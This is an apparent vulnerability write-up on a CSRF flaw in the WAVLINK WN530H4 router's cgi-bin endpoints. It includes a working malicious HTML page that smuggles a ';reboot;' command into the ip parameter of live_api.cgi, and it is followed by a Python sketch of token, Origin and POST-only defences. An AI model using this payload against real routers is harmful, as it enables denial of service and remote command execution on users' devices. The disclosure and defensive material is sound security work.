This vulnerability is a Cross-Site Request Forgery (CSRF) in the WAVLINK WN530H4 router.
Many endpoints in the web interface's /cgi-bin/ directory are vulnerable to CSRF. This allows other websites to submit requests to the router without the user knowing, even if the router manufacturers patch the cgi-bin authentication bypass (however, the attack will only work if the admin is logged in).
Attackers with hoards of router vulnerabilities could set traps on the Internet: maliciously crafted websites that trigger vulnerabilities in the router. As an example, consider this malicious HTML page.
<html>
  <head>
    <title>Reboot!</title>
    <script src="http://192.168.10.1/cgi-bin/live_api.cgi?page=hacked&id=1337&ip=;reboot;"></script>
  </head>
  <body>
    <h1>This webpage reboots the WAVLINK router.</h1>
  </body>
</html>
This malicious HTML exploits the command-line injection vulnerability “remotely” to reboot the router (effectively causing a denial of service). An unsuspecting user could fall victim to this attack by clicking a link to a page containing this code. Of course, many more damaging attacks can be executed, including malicious binaries being downloaded remotely and executed.
To solve this, the router must employ CSRF protections, such as anti-forgery tokens. It seems that the router manufacturers attempted this by protecting most of the webpages with a token, but none of the cgi-bin endpoints are covered by it, rendering the defense useless.
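The following is an added example, not code from the router firmware or from the original report: a sketch of the gate each state-changing cgi-bin handler could run before acting, combining a POST-only rule, an Origin check and a session-bound anti-forgery token. The function names, the per-boot SERVER_KEY and the sample requests are assumptions made for illustration; the environment keys are the standard CGI variables.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: a random secret generated at boot and never sent to the browser.
SERVER_KEY = secrets.token_bytes(32)

def issue_token(session_id: str) -> str:
    """Anti-forgery token bound to the admin session; the UI embeds it in each form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def check_request(environ: dict, session_id: str, token: str) -> str:
    """Gate for every state-changing /cgi-bin/ handler. Returns 'ok' or the failed check."""
    # <script src>, <img> and plain links can only send GET, so refuse it outright.
    if environ.get("REQUEST_METHOD") != "POST":
        return "method"
    # If the browser sent Origin, it must be the router's own host.
    origin = environ.get("HTTP_ORIGIN")
    if origin is not None and urlsplit(origin).netloc != environ.get("HTTP_HOST"):
        return "origin"
    # Constant-time comparison against the token expected for this session.
    expected = issue_token(session_id).encode()
    if not hmac.compare_digest(expected, (token or "").encode()):
        return "token"
    return "ok"

def demo() -> dict:
    sid = "constructed-session-id"  # constructed sample value
    host = "192.168.10.1"
    good = issue_token(sid)
    requests = {
        # The page's <script src=...> request: a GET with no token.
        "script_tag": ({"REQUEST_METHOD": "GET", "HTTP_HOST": host}, ""),
        # Auto-submitted form on another site (constructed origin).
        "foreign_form": ({"REQUEST_METHOD": "POST", "HTTP_HOST": host,
                          "HTTP_ORIGIN": "http://attacker.example"}, ""),
        # POST with no Origin header and a guessed token.
        "bad_token": ({"REQUEST_METHOD": "POST", "HTTP_HOST": host}, "0" * 64),
        # The router's own UI submitting its form.
        "router_ui": ({"REQUEST_METHOD": "POST", "HTTP_HOST": host,
                       "HTTP_ORIGIN": "http://192.168.10.1"}, good),
    }
    return {name: check_request(env, sid, tok) for name, (env, tok) in requests.items()}

if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:13} -> {verdict}")
```

The token only helps if every cgi-bin endpoint calls the gate; protecting the HTML pages alone leaves the handlers reachable, which is the gap described above.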
For more information and vulnerability analysis, please see my report on the WAVLINK WN530H4.